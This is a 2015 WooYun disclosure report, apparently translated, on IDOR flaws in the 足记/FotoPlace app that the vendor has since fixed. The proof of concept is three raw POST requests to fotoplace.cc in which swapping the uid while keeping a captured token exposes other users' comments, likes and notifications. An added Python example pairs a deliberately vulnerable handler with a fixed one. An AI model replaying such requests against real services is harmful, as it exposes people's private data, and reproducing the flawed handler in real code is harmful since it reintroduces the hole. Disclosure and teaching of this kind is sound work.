Vulnerability summary

Defect ID: wooyun-2015-0120480

Vulnerability title: Multiple horizontal privilege (IDOR) vulnerabilities in the 足迹 app

Vendor: 足记APP

Author: 幻老头儿

Submitted: 2015-06-14 19:49

Fixed: 2015-07-29 23:46

Published: 2015-07-29 23:46

Vulnerability type: Unauthorized access / authorization bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure timeline:

2015-06-14: Details sent to the vendor, awaiting vendor handling
2015-06-14: Vendor confirmed; details visible to the vendor only
2015-06-24: Details disclosed to core white hats and domain experts
2015-07-04: Details disclosed to regular white hats
2015-07-14: Details disclosed to intern white hats
2015-07-29: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

In the user-messages area, several endpoints suffer from a horizontal privilege (IDOR) flaw: the server trusts the client-supplied uid, so simply changing it lets anyone view another user's sensitive activity data.

Proof of concept:

[Screenshot: 1.png]

Using the official 足记 account (id 1) as the example.
Comments

POST /api2/user/user_get_comment.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 97
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=1&version=2.6


Likes

[Screenshot: 2.png]


POST /api2/user/user_get_like_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 103
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6


[Screenshot: 4.png]


Notifications

POST /api2/user/user_get_notice_list.php HTTP/1.1
Host: fotoplace.cc
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: cookie_tempuid=192.168.100.614266984861566120746
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9
Content-Length: 106
Connection: keep-alive
User-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)
pageindex=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6


[Screenshot: 3.png]

Suggested fix:

Verify the caller's identity (the sign) before every operation, instead of trusting the uid sent by the client.

Copyright notice: when reposting, credit the source: 幻老头儿@乌云
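To illustrate the fix above, here is an added example (not code from the report or from the FotoPlace service, whose endpoints are PHP) of a notice-list handler in its flawed and hardened forms. The session table, notice data, token values and tuple-style return convention are all constructed placeholders.

```python
# Added illustration of the authorization bug described in this report.
# All tokens, uids and data below are constructed placeholders.
import hmac
from typing import Dict, List, Optional, Tuple

# Constructed session table: bearer token -> uid of the authenticated account
SESSIONS: Dict[str, int] = {
    "tok-user-6146812": 6146812,
    "tok-user-1": 1,
}

# Constructed private data, standing in for what a notice-list endpoint returns
NOTICES: Dict[int, List[str]] = {
    1: ["new follower", "comment on post 42"],
    6146812: ["you were mentioned in post 17"],
}

Response = Tuple[int, List[str]]  # (HTTP-style status, payload)

def uid_from_token(token: str) -> Optional[int]:
    """Resolve the caller from the token; constant-time compare so the lookup
    itself does not leak which tokens exist."""
    for known, uid in SESSIONS.items():
        if hmac.compare_digest(known, token):
            return uid
    return None

def vulnerable_get_notices(params: Dict[str, str]) -> Response:
    """Mirrors the flaw: the token only proves *someone* is logged in, while
    the record owner is taken from the client-supplied uid parameter."""
    if uid_from_token(params.get("token", "")) is None:
        return 401, []
    owner = params.get("uid", "")
    return 200, NOTICES.get(int(owner) if owner.isdigit() else -1, [])

def fixed_get_notices(params: Dict[str, str]) -> Response:
    """Hardened form: the data owner is always the authenticated user. A uid
    that disagrees with the session is rejected with 403; that mismatch is
    also the event worth logging to detect this bug class being probed."""
    caller = uid_from_token(params.get("token", ""))
    if caller is None:
        return 401, []
    requested = params.get("uid")
    if requested is not None and requested != str(caller):
        return 403, []
    return 200, NOTICES.get(caller, [])

# Constructed request shaped like the captured body: the caller holds the
# token of user 6146812 but asks for uid=1.
REQUEST = {"pageindex": "0", "token": "tok-user-6146812", "uid": "1", "version": "2.6"}
```

The vulnerable handler returns user 1's notices for this request; the fixed handler answers 403 and only ever serves the session owner's own data.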


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-14 23:46

Vendor reply:

Being handled; thank you for the vulnerability report.

Latest status:

2015-06-16: Fixed